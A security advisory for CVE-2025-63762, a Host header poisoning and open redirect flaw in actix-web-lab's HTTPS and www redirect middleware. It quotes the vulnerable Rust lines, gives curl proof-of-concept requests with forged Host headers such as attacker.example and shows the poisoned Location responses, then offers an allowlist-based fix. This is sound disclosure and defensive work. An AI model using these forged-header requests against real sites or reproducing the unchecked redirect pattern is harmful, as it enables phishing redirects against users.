Summary
actix-web-lab redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the Location response header, causing open redirect/phishing behavior.
CVE
Assigned CVE ID: CVE-2025-63762
Details
The issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:

- actix-web-lab/src/redirect_to_https.rs (around lines 119-132)

  ```rust
  let host = conn_info.host();
  format!("https://{hostname}{path}")
  format!("https://{hostname}:{port}{path}")
  ```

- actix-web-lab/src/redirect_to_www.rs (around lines 30-35)

  ```rust
  format!("{scheme}://www.{host}{path}")
  ```

- actix-web-lab/src/redirect_to_non_www.rs (around lines 30-34)

  ```rust
  format!("{scheme}://{host_no_www}{path}")
  ```
Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.
PoC
Environment used for validation:
- Local minimal Actix apps using actix-web-lab middleware
- RedirectHttps: http://127.0.0.1:18080
- redirect_to_www: http://127.0.0.1:18081
- redirect_to_non_www: http://127.0.0.1:18082

Reproduction (RedirectHttps):

```
curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"
```

Observed response:

```
HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test
```

Additional verification:

```
curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"
```

Observed response:

```
HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def
```

Reproduction (redirect_to_www):

```
curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"
```

Observed response:

```
HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello
```

Reproduction (redirect_to_non_www):

```
curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"
```

Observed response:

```
HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path
```
Impact
This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.
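The mitigation the advisory points at is deployment-side host allowlisting: the redirect target must be derived from a host the deployment owns, not from whatever the client put in the Host header. The following is an added, self-contained Rust example (not actix-web-lab code and not tied to its middleware API) that shows the unchecked `format!("https://{host}{path}")` pattern next to a hardened variant. The `split_host`, `unchecked_https_redirect` and `checked_https_redirect` functions and the allowlist contents are assumptions made for this example; a real deployment would supply the allowlist from configuration and answer 400 instead of redirecting when the check fails.

```rust
// Added example, not part of actix-web-lab: validate the Host header against
// a deployment-owned allowlist before building an absolute redirect.
// Assumptions: Host arrives as a &str; the allowlist is configured by the
// deployment; port handling mirrors the "https://{hostname}:{port}{path}" shape.

/// Splits a Host header value into (lowercased hostname, optional port).
/// Returns None for empty values, bracketed IPv6 literals (not handled here,
/// so they cannot slip past the allowlist), non-numeric ports, or hostnames
/// containing characters outside [A-Za-z0-9.-].
fn split_host(raw: &str) -> Option<(String, Option<u16>)> {
    let raw = raw.trim();
    if raw.is_empty() || raw.starts_with('[') {
        return None;
    }
    let (host, port) = match raw.rsplit_once(':') {
        Some((h, p)) => (h, Some(p.parse::<u16>().ok()?)),
        None => (raw, None),
    };
    let host = host.to_ascii_lowercase();
    let valid = !host.is_empty()
        && host
            .bytes()
            .all(|b| b.is_ascii_alphanumeric() || b == b'-' || b == b'.');
    if !valid {
        return None;
    }
    Some((host, port))
}

/// Unchecked pattern (stand-in for building Location from connection_info
/// without validation): whatever the client sent becomes the redirect target.
fn unchecked_https_redirect(host_header: &str, path: &str) -> String {
    format!("https://{host_header}{path}")
}

/// Hardened pattern: only build a Location for hosts in the allowlist.
/// None means "do not redirect"; the caller should answer 400 Bad Request.
fn checked_https_redirect(host_header: &str, path: &str, allowlist: &[&str]) -> Option<String> {
    let (hostname, port) = split_host(host_header)?;
    if !allowlist.iter().any(|a| a.eq_ignore_ascii_case(&hostname)) {
        return None;
    }
    Some(match port {
        Some(p) if p != 443 => format!("https://{hostname}:{p}{path}"),
        _ => format!("https://{hostname}{path}"),
    })
}

fn main() {
    // Constructed sample inputs; the hostnames match the advisory's PoC.
    let allow = ["example.com", "www.example.com"];
    for h in ["example.com", "attacker.example", "evil.example:9999"] {
        println!(
            "Host: {h:<20} unchecked={:<35} checked={:?}",
            unchecked_https_redirect(h, "/test"),
            checked_https_redirect(h, "/test", &allow)
        );
    }
}
```

With the allowlist above, `attacker.example` and `evil.example:9999` produce no redirect at all, while `example.com` (in any letter case, with or without an explicit port) yields the expected `https://example.com/...` Location. The same check applies to the www/non-www middleware shapes: validate first, then rewrite the prefix of a host you have already accepted.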
References